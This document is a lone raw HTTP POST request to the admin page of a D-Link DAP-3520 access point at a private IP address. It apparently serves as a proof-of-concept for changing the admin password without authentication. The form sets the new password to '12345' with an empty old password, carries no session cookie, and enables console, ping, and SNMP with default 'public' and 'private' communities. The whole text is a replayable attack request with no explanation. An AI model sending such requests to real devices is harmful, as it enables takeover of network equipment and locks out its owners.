POST /tool_admin.php HTTP/1.1
Host: 192.168.33.132:33137
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 410
Origin: http://192.168.33.132:33137
Connection: close
Referer: http://192.168.33.132:33137/tool_admin.php
Upgrade-Insecure-Requests: 1
Priority: u=4

ACTION_POST=tool_admin&f_console_pro=1&f_add_value=&f_list_del=&f_limit_status=2&f_ping_status=0&f_snmp_status=1&f_trap_status=&admin_vid=1&limit_admin_ip=1&ip_from=&ip_to=&sysname=D-Link+DAP-3520&location=china&login_setting=1&user_name=admin&old_password=&new_password=12345&confirm_password=12345&console_status=1&console_pro=1&timeout=180&snmp_status=1&snmp_public=public&snmp_private=private&ping_status=1